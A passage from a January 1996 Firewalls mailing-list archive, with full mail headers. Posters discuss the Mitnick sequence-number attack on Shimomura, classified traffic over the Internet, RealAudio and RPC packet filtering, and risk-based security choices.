07:37:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22308 for firewalls-outgoing; Thu, 11 Jan 1996 07:08:23 -0800 (PST) Received: from smtp1.interramp.com (smtp1.interramp.com [38.8.45.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22303 for ; Thu, 11 Jan 1996 07:08:19 -0800 (PST) Received: from [38.11.94.44] by smtp1.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) id KAA00276; Thu, 11 Jan 1996 10:06:49 -0500 X-Sender: cd000674@pop3.interramp.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 12:00:28 +0900 To: Benjamin Allan Smith From: dolphin@interramp.com (Tidewater Cyberfish) Subject: None Secure Line Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Brain21 wrote: > >>Hell, my father used >>to do top secret work for the Dept. of Defense (he neede "Q" clearance, >>and needs higher now) and the office where he worked communicated to it's >>other offices over the net. They used netcom. Not too terribly secure >>if you ask me. They did not use encryption. I'd be willing to bet a months pay he didn't use that line to transmit classified or even SBU (sensitive but unclassified) information over that line. rmck ____________________________ Bob McKisson Cypress Systems Corporation Chesapeake, VA 22320 (804) 436-1780 Voice/STU-III dolphin@interramp.com From firewalls-owner Thu Jan 11 07:40:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA20760 for firewalls-outgoing; Thu, 11 Jan 1996 06:15:23 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA20744 for ; Thu, 11 Jan 1996 06:15:09 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id IAA03580; Thu, 11 Jan 1996 08:14:12 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id IAA09100; Thu, 11 Jan 1996 08:14:09 -0600 Date: Thu, 11 Jan 1996 08:14:09 -0600 Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: brain21@montag33.residence.gatech.edu Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brain21 wrote: >On Wed, 10 Jan 1996, Doug Hughes wrote: > >> 2) the spoofing attack had not become common knowledge and widespread use >> until this series of attacks was demonstrated. Papers had been around >> for years on the potential for this, but, as I recall, until this time, >> there weren't any hacker tools that were widely known about for exploiting. > >I agree, but the possibility is always there. If you are in the security >business, then it pays to protect against everything possible, and not to >underestimate your "adversaries." > >> Remember, (Not that this means anything but), the CERT advisory wasn't >> published until 1/23 95 and the attacks took place over Xmas of '94. >> To the best of my recollection, the sequence number randomizing (which >> is MUCH harder to implement than the router rules that prevent spoofing) >> wasn't available until January of '95 either. >> Now, CERT is usually slow about announcing such things, but, the patch >> was relatively simple to implement in a router, so, you'd think that >> not long after they heard about it, it would be posted. Even the sites > >That doesn't necessarily mean anything. I've seen advisories come out >from cert WELL after other advisories have come out on other mailing >lists, with patches and everything. > No, it doesn't, but, on the other hand, can one defend against every 'possible' attack that somebody has written a white paper on in the last 10 years? In this case, the CERT, Bugtraq, CIAC, 8lgm, and all the other adivsories that normally appear were all after the event in question, in my recollection. (In fact, some of them never even had advisories.) > >I think my point is that Shimomura should not have underestimated Mitnick >or anyone, especially since he KNEW that it was possible. >Overconfidence? I don't know. Maybe Shimomura didn't even set up the >security there and trusted it? I don't know. I just find it kinda ironic. > Possibly, but people can't be omniscient either. Perhaps it was a justifiable oversite on some several year old information that he (and everyone else I might add) thought wouldn't become and exploit script. I'm just saying that there's a lot of speculation going on about if he knew that the attack was actually occurring at the time. I think it started becoming widespread (but not publicized) about November of '94. Most of the people on the firewall list were unaware of it at that time as well. I honestly don't know the answer, just pointing out plausible reasons. Knowing it's possible is different than knowing it actually works and is being used. It's possible that a meteor will hit my house, knowing that, I could take precautions and try to build a really expensive bubble and radar interfaced laser system around my house. Now, this isn't exactly a fair comparision, since, defending against this attack is usually REALLY easy.. :) Well, I think I've said enough on the subject. Lots of speculation on few facts. -Over and out -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Thu Jan 11 08:05:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22505 for firewalls-outgoing; Thu, 11 Jan 1996 07:15:10 -0800 (PST) Received: from softserv.tcst.com (softserv.spectrum.titan.com [199.1.156.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22500 for ; Thu, 11 Jan 1996 07:15:02 -0800 (PST) Received: (from tighe@localhost) by softserv.tcst.com (8.6.12/8.6.12) id JAA20489; Thu, 11 Jan 1996 09:12:45 -0600 From: Mike Tighe Message-Id: <199601111512.JAA20489@softserv.tcst.com> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG To: Scott_Rickard@mc.xerox.com (Rickard, Scott) Date: Thu, 11 Jan 1996 09:12:45 -0600 (CST) Cc: firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, jya@pipeline.com, frankw@in.net Reply-To: tighe@spectrum.titan.com In-Reply-To: <"<7124F430819C2976>7124F430819C2976@x-mc-xrx2-ms3.xerox"@-SMF-> from "Rickard,Scott" at Jan 10, 96 12:39:33 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rickard,Scott writes: >The answer is quite clear if you have spook world experience and >identify with several key elements quoted in Frank Willoughby's >re-post of the Cypherpunks mailing list message regarding extracts >from Jonathan Littman's book "The Fugitive Game: Online With Kevin Mitnick," This is a great tale, but until people start turning up dead like they did in Stoll's case, it will be highly suspect. From firewalls-owner Thu Jan 11 08:14:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22538 for firewalls-outgoing; Thu, 11 Jan 1996 07:16:43 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22533 for ; Thu, 11 Jan 1996 07:16:39 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id JAA24510; Thu, 11 Jan 1996 09:09:17 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma024508; Thu Jan 11 09:09:15 1996 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA00773 (5.67b/IDA-1.5); Thu, 11 Jan 1996 09:22:15 -0600 Date: Thu, 11 Jan 1996 09:22:15 -0600 From: Ken Hardy Message-Id: <199601111522.AA00773@ignatz.bridge.com> To: cjwoods@wire.paladin.com Subject: Re: UDP and the unclean... Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Woods spake thusly: >RealAudio "randomizes" the UDP port that it tries to >connect to within a range. That means that to accept RealAudio on your >protected network, you must open a hole in your filter to allow UDP on a There is also a TCP connection for realaudio. I presume that this is used for control purposes. Does anyone know whether information concerning the source and/or destination UDP port to be used are first conveyed over the TCP connection? If so it might be possible, given protocol details, to write an intelligent proxy that would only allow "legitimate" realaudio packets through. (Don't you love proprietary protocols?) -- KH From firewalls-owner Thu Jan 11 08:44:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA23184 for firewalls-outgoing; Thu, 11 Jan 1996 07:35:05 -0800 (PST) Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA23162 for ; Thu, 11 Jan 1996 07:34:49 -0800 (PST) Received: from csb042.emirates.net.ae by ns2.emirates.net.ae (5.x/SMI-SVR495081401) id AA17249; Thu, 11 Jan 1996 19:33:24 +0400 Date: Thu, 11 Jan 1996 19:33:23 +0400 Message-Id: <9601111533.AA17249@ns2.emirates.net.ae> X-Sender: gscpraba@emirates.net.ae X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Andrew Cameron From: gscpraba@ns2.emirates.net.ae (G.S.C.Prabhakar (The Sun)) Subject: Re: Internet Policy/Security Policy Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I would like to know where I can find examples of an Internet/Security >Policy for a company. > >I will need to write one in the near future and would like to draw on >the experiance of others. > You can refer RFC 1108, RFC 1038 as a starting point. GSC Prabhakar **************************************************************************** ***** G.S.C.Prabhakar (gscpraba@emirates.net.ae) Director ( Internet Security, Solutions and Training) Global Systems Consultants ,P.O.Box 72432 , Abu Dhabi.,United Arab Emirates. Pager :(00-971-8) 91-555-304*Yournumber# Phone : 00-(971-2)-762080 Consultancy Office :(00-971-4-)-687711 ** Fax :00- (971-4)-687265 **************************************************************************** ******* From firewalls-owner Thu Jan 11 08:44:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22411 for firewalls-outgoing; Thu, 11 Jan 1996 07:12:58 -0800 (PST) Received: from softserv.tcst.com (softserv.spectrum.titan.com [199.1.156.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22406 for ; Thu, 11 Jan 1996 07:12:54 -0800 (PST) Received: (from tighe@localhost) by softserv.tcst.com (8.6.12/8.6.12) id JAA20468; Thu, 11 Jan 1996 09:10:36 -0600 From: Mike Tighe Message-Id: <199601111510.JAA20468@softserv.tcst.com> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG To: Scott_Rickard@mc.xerox.com (Rickard, Scott) Date: Thu, 11 Jan 1996 09:10:36 -0600 (CST) Cc: firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, jya@pipeline.com, frankw@in.net Reply-To: tighe@spectrum.titan.com In-Reply-To: <"<7124F430819C2976>7124F430819C2976@x-mc-xrx2-ms3.xerox"@-SMF-> from "Rickard,Scott" at Jan 10, 96 12:39:33 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rickard,Scott writes: >>I would like to know this... if Shimomura is so good (an I actually >>believe that he may be) then why did he leave the r-utils enabled? Why >>did he not use TCPWrappers to prevent spoofing? Why did he allow people >>to see inside his network (Mitnick saw that there was a machine >>"X-something" that he believed was trusted by Shimomura's machine)? Obviously there were some holes in his system that should have been plugged, but that does not mean it was his responsibility to have fixed them? From firewalls-owner Thu Jan 11 08:46:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22602 for firewalls-outgoing; Thu, 11 Jan 1996 07:19:20 -0800 (PST) Received: from bv.com (bv.com [147.182.5.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA22597 for ; Thu, 11 Jan 1996 07:19:16 -0800 (PST) Received: by bv.com; id JAA03722; Thu, 11 Jan 1996 09:13:17 -0600 (CST) Received: by at3038p.kc.bv.com with Microsoft Mail id <30F54634@at3038p.kc.bv.com>; Thu, 11 Jan 96 09:17:40 PST From: "Archer, Barry J." To: "'Firewalls Digest'" Subject: Re: Encryption export laws from US... Date: Thu, 11 Jan 96 09:21:00 PST Message-ID: <30F54634@at3038p.kc.bv.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk *Very* rare for me to see anything from Paul Ferguson that I disagree with, but I think this thread is very applicable to firewall discussions. One of the major can'o'worms I face is how to set up secure USER to Firewall sessions over the Internet. It's not a matter of whether or not I like it, it's coming. Firewall to Firewall encryption is great, but when you have nomadic remote users and small international offices individual access gets important for a lot of folks. Plus, some countries now seem to have more reliable Internet access than private voice/data line access...which is actually what prompted the first inquiry I got for 'why can't I..." My nightmare is a different solution for each and every country... Barry Archer archerbj@bv.com "These opinions are mine, Mine, MINE!" - me "Who cares?" - my cat >From: Paul Ferguson >Date: Wed, 10 Jan 1996 21:23:26 -0500 >Subject: Re: Encryption export laws from US.. > >You may want to redirect this request to the cypherpunks mailing >list instead, where you have a more on-topic >audience. > >- - paul From firewalls-owner Thu Jan 11 08:48:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA23117 for firewalls-outgoing; Thu, 11 Jan 1996 07:33:15 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA23098 for ; Thu, 11 Jan 1996 07:33:02 -0800 (PST) Received: by inet1.tek.com id ; Thu, 11 Jan 1996 07:31:57 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma039035; Thu Jan 11 07:31:26 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA24607; Thu, 11 Jan 96 07:31:25 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA17961; Thu, 11 Jan 96 07:32:51 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA03270; Thu, 11 Jan 96 07:30:43 PST Date: Thu, 11 Jan 1996 07:30:42 -0800 (PST) From: Kent Dahlgren To: Brett Lymn Cc: Brain21 , firewalls@greatcircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <9601110955.AA27779@bunya.awadi> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Brett Lymn wrote: > According to Brain21: > > > >Hell, my father used > >to do top secret work for the Dept. of Defense (he neede "Q" clearance, > >and needs higher now) and the office where he worked communicated to it's > >other offices over the net. They used netcom. Not too terribly secure > >if you ask me. They did not use encryption. > > Ummmm I suspect that things may be a bit different to that which you > have implied. Even in an organisation handling secret material a lot > of the day to day running of the place is not classified - you know, > things like when the next barbeque (or cook-out or whatever word you > guys use for the process of carbonising meat over a flame outdoors > whilst getting drunk.... :*) will be or getting someone to order more > pens for the stationery cabinet - such things are not and should not > be classified. I bet all the secret documents/matters were not sent > over the net (though I could be wrong....) - it is certainly the way > things work here. I hold a TS SCI clearance with the Air Force. I've been in for almost 10 years, and I've never heard of a "Q" clearance. Not to say there isn't any such thing; I don't pretend to know everything. But classified traffic is never (supposed to) travel over the 'net. That's what AUTODIN is for. Not that it can't be done, its just that I suspect that if the gentleman's father was deemed trustworthy enough to hold a "Q" clearance, then he can be trusted to understand the legal implications of transmitting secure traffic over unsecured means. Every time you use the phone from a military installation, you run the risk of being listened to. Even the most incompetent troop understands what happens to him/her is they handle classified information sloppily. The worst violations of that have been minor mentions of things like "...man, we spent the day putting snow tires on trucks.." which can be just as bad. Again, while regular Internet E-mail is used for basic communication, very few will jeapordise themselves needlessly and foolishly by sending classified traffic, which is strictly accounted for, over Internet E-mail. ______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Thu Jan 11 08:53:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22155 for firewalls-outgoing; Thu, 11 Jan 1996 07:01:41 -0800 (PST) Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22150 for ; Thu, 11 Jan 1996 07:01:36 -0800 (PST) Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id KAA12166 for Firewalls@GreatCircle.COM; Thu, 11 Jan 1996 10:00:49 -0500 From: "Marcus J. Ranum" Message-Id: <199601111500.KAA12166@switchblade.v-one.com> Subject: Re: Firewalls-Digest V5 #16 To: Firewalls@GreatCircle.COM Date: Thu, 11 Jan 1996 10:00:49 -0500 (EST) In-Reply-To: <199601110730.XAA06814@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 10, 96 11:30:28 pm Reply-To: mjr@switchblade.v-one.com Organization: V-One Corporation, Baltimore, MD Office URL: Mjr's page Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brain21 writes: >I would not be >surprised if many of the security experts out there worked on less secure >machines than what they set up for their clients. I'll tell you the secret, if you promise not to spread it around. :) The box I'm using here ("here" is V-ONE's Baltimore office; my house) is a BSDI box running an older rev and I probably haven't patched all the patches I should. Its got a lot of unnecessary services stripped out, but you can, for example, even use "finger" on it. That's because this box is just an access point. The important stuff takes place on another machine upstairs, and on a Windows95 PC that's right next to it. Data crosses the air gap on floppies, when it has to, which is seldom. There isn't any special security or anything on "switchblade" because there doesn't need to be. Now, here's the secret: 1) My home computer security architecture is the result of a carefully thought-out risk assessment and requirements analysis. It goes like this: a) I have important stuff on my Windows PC and PC networking sucks so I can make my life a lot easier by just not worrying about getting my PC running TCP/IP and it'll be secure besides. b) I only seldom need to transfer data between the Windows PC and the Internet, and when I do it is important stuff so having a spare copy on a floppy is a Good Thing. c) Swapping floppies is technically gross and someone may laugh at me, but I can live with that. d) I have a complete copy of the machine on a DAT. If someone fries the system I'll be back on the air in a few hours. I'll be inconvenienced. e) I can't afford a firewall, and don't know how to build one. 2) The residual risk is that someone might break into switchblade and announce that they had "hakk3d that l8m3r mjr" and it'd probably cost me a few hours explaining to people why that was Not A Big Deal and it'd be very irritating, and I'd have some after the fact damage control and who knows someone might think it was all an NSA conspiracy. [Which is patent nonsense, since I work for the KGB, not NSA] 3) If damage control is an issue, I've now protected myself by loudly announcing to a large mailing list that *MY* Internet box is unimportant. Therefore, if something does happen to it, I've already pulled the teeth from the public relations problem since everyone on the list knows that only a totally lamer hacker would go after a useless unprotected glorified Xterm and Email box. There is another ancillary tactic I won't go into, which is "plausible deniability" in which I would simply try to *convince* everyone the machine was unimportant while in fact it was. I'm not doing that here because real deniability beats plausible deniability hands down. :) Incidentally, the main "security" on "switchblade" is what I have dubbed "Security by stupidity." Feel free to telnet to the "switchblade.v-one.com" and poke around. Nothing is harmful, no salesmen will call, no paratroopers will land. Please don't trash my machine because it'll take me an hour to reload it from the DAT and I will feel morally obligated to yell at you if we ever meet. I suspect, but I don't know, that Tsutomu would probably say something similar. The game of securing systems is correctly balancing risks against technical responses to risk. If you can convince yourself the risks are low, then the technical responses required are also low. If you don't take the time to figure out what's at stake you can't produce a measured, appropriate response. mjr. From firewalls-owner Thu Jan 11 09:38:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA23307 for firewalls-outgoing; Thu, 11 Jan 1996 07:38:47 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA23297 for ; Thu, 11 Jan 1996 07:38:10 -0800 (PST) Received: by inet1.tek.com id ; Thu, 11 Jan 1996 07:37:12 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma035172; Thu Jan 11 07:37:02 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA25052; Thu, 11 Jan 96 07:37:01 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA18058; Thu, 11 Jan 96 07:38:28 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA03307; Thu, 11 Jan 96 07:36:21 PST Date: Thu, 11 Jan 1996 07:36:20 -0800 (PST) From: Kent Dahlgren To: Benjamin Allan Smith Cc: firewalls@greatcircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <199601111046.CAA18112@archimedes.vislab.navy.mil> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > I highly doubt that. Every machine that I have seen on base which has > Secret (or higher) data is not allowed to have *any* physical connection with > the internet (the mjr 100% sure firewall to the internet--cut the wires). > Once someone inadvertantly emailed the classified name of a project over > a network connected to the Internet. The day was spent completely wiping > all of the hard drives on all of the machines that might have received that > email (3 complete overwrites with random data if I recall correctly) and then > the OS and data were restored from the previous night's backups. A head > rolled for that error. So if all that effort was made over a single word, I > *highly* doubt that you father used netcom to discuss classified matters. > Thank you, sir. ______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Thu Jan 11 09:41:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA25812 for firewalls-outgoing; Thu, 11 Jan 1996 08:42:30 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA25807 for ; Thu, 11 Jan 1996 08:42:26 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id IAA01901; Thu, 11 Jan 1996 08:39:30 -0800 Received: from panix.com(198.7.0.2) by mycroft via smap (V1.3mjr) id sma001895; Thu Jan 11 08:39:11 1996 Received: (from owend@localhost) by panix.com (8.7/8.7/PanixU1.3) id LAA18095 for Firewalls@GreatCircle.com; Thu, 11 Jan 1996 11:39:27 -0500 (EST) From: Owen Davis Message-Id: <199601111639.LAA18095@panix.com> Subject: NT Fire Wall To: Firewalls@GreatCircle.com Date: Thu, 11 Jan 1996 11:39:26 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I, like many others, am giving NT a shot for some of my networking needs. Do you know of an excellent NT Firewall ? Thank you much in advance. Owen Davis From firewalls-owner Thu Jan 11 09:42:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA25999 for firewalls-outgoing; Thu, 11 Jan 1996 08:49:48 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA25994 for ; Thu, 11 Jan 1996 08:49:40 -0800 (PST) Date: Thu, 11 Jan 1996 11:48:38 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960111114838.20201c39@hobbes.orl.mmc.com> Subject: re: Sequence Number Attacks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I rote: >> Is easy also to make the first line in your firewall ACL "Deny incoming >> ". Belt and suspenders are good 8*). Scott wreplied: >Wouldn't doing this break some MUA's that are looking to connect to >their smtp server locally or the system defined as mailhost (which is >usually never defined as localhost)? Only if the mailhost is sitting outside the firewall. In the case of a bastion network, I prefer to use a different port on the router with its own ACL. NO internal address should be coming in from the outside to *any* port, not just the "r"s. Warmly, Padgett From firewalls-owner Thu Jan 11 09:44:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA26416 for firewalls-outgoing; Thu, 11 Jan 1996 09:23:33 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA26384 for ; Thu, 11 Jan 1996 09:22:43 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id IAA01999; Thu, 11 Jan 1996 08:57:32 -0800 Received: from milka.bothgood.com(152.160.74.1) by mycroft via smap (V1.3mjr) id sma001995; Thu Jan 11 08:56:46 1996 Received: (from zhen@localhost) by milka.bothgood.com (8.6.12/8.6.9) id NAA07125; Thu, 11 Jan 1996 13:12:15 -0500 Date: Thu, 11 Jan 1996 13:12:15 -0500 (EST) From: Zhen To: firewalls@GreatCircle.COM Subject: WWW Server and Firewall Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I would like to know whether it is possiable to setup a WWW server inside of the firewall and avoid the WWW server communicating directly with the Internet? Any advice will be helpful and Thanks in advance! Zhen Xu zhen@milka.bothgood.com From firewalls-owner Thu Jan 11 09:48:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA26220 for firewalls-outgoing; Thu, 11 Jan 1996 09:07:40 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA26215 for ; Thu, 11 Jan 1996 09:07:30 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id JAA16244; Thu, 11 Jan 1996 09:05:40 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma016241; Thu Jan 11 09:05:20 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id JAA18920; Thu, 11 Jan 1996 09:05:29 -0800 (PST) Date: Thu, 11 Jan 1996 09:05:29 -0800 (PST) From: Brian Murrell Message-Id: <199601111705.JAA18920@mocha.bctel.net> To: Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com Subject: Re: Firewalls-Digest V5 #14 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: FIyg765G8u4KKq/xdJ3jyA== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > To make matters worse a lot of UDP applications (most > notably Sun RPC, and RealAudio) run on arbitrary ports, which > makes them even harder to sensibly track. A lot of folks are > comfortable letting UDP port 53 (DNS) into their firewalls. > DNS is pretty well-known and well-behaved. Not so RPC. Some points and questions. Real Audio can be handled by a "stateful packet filter". Firewall-1 have recently put some filtering rules on their Web site for FW-1 users to add to their rulebase to allow RealAudio in. I checked just to make sure they weren't opening the big hole. The datastream does seem to carry the return port in the clear much like FTP's data connection PORT command. It's a little more complicated but the theory is the same. I do agree the that unpredictability of RPC application port numbers is a pain, but stateful packet filters solve that problem. They watch for the portmapper traffic to "learn" what services are on what ports. However, is the RPC infrastructure itself without any actual RPC programs insecure?? Does it have any vulnerabilities in and of itself, or is the nature of RPC and how it maps ports (somewhat randomly) from a pool that you find insecure?? Do the actual applications that use RPC calls have any "extra vulnerabilities" because they were written with RPCs?? Can you point me to any papers on any of the above?? b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Thu Jan 11 09:49:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA25243 for firewalls-outgoing; Thu, 11 Jan 1996 08:24:40 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA25235 for ; Thu, 11 Jan 1996 08:24:31 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id LAA19797; Thu, 11 Jan 1996 11:22:31 -0500 Date: Thu, 11 Jan 1996 11:22:31 -0500 (EST) From: Brain21 To: Frank Willoughby cc: firewalls@GreatCircle.COM Subject: Re: Fw License In-Reply-To: <9601091755.AA27180@su1.in.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 Jan 1996, Frank Willoughby wrote: > Sudden growth (mergers, acquisitions, etc) could impact the licensing > of the firewall & either get the customer in hot water with SPA or the > vendor or face a denial-of-service for those extra connections until OK, this is a little off-topic, and I will probably get flamed for this... I could be wrong, so someone correct me if I am (as I am sure you will). The SPA really only goes after large piraters (i.e. corporations) and only after pushed by a vendor. They also get some sort of a significant fee for following up on these cases, often even when the vendor does not get anything. Kinda seems like these people are profiteers, and will only get involved if there is money in it for them. I can NOT respect that. IMO they should be non-profit. Fees should go to vendors. Private funding is another possibility. If PBS can do it, and EFF can do it, so can they. This situation, IMO opinion makes them worse than the pirater. Many times the people who pirate are either situations asa described above (a company buys the product and licenses, and as they grow, they do not pay for the additional licenses necessary), or some kids running a board or anon ftp site on the net. Businesses can save money, but not necessarily profit off of this (IMO, in this situation a penny saved is NOT a penny earned since the 2 situations are totally different). The only one who profits is the SPA. Seems to me like the ones who are profiting off of pirating are the ones who hold themselves as "high and mighty" and "rightous" (sp?). Seems to me like they are pulling the wool over everyone's eyes. It 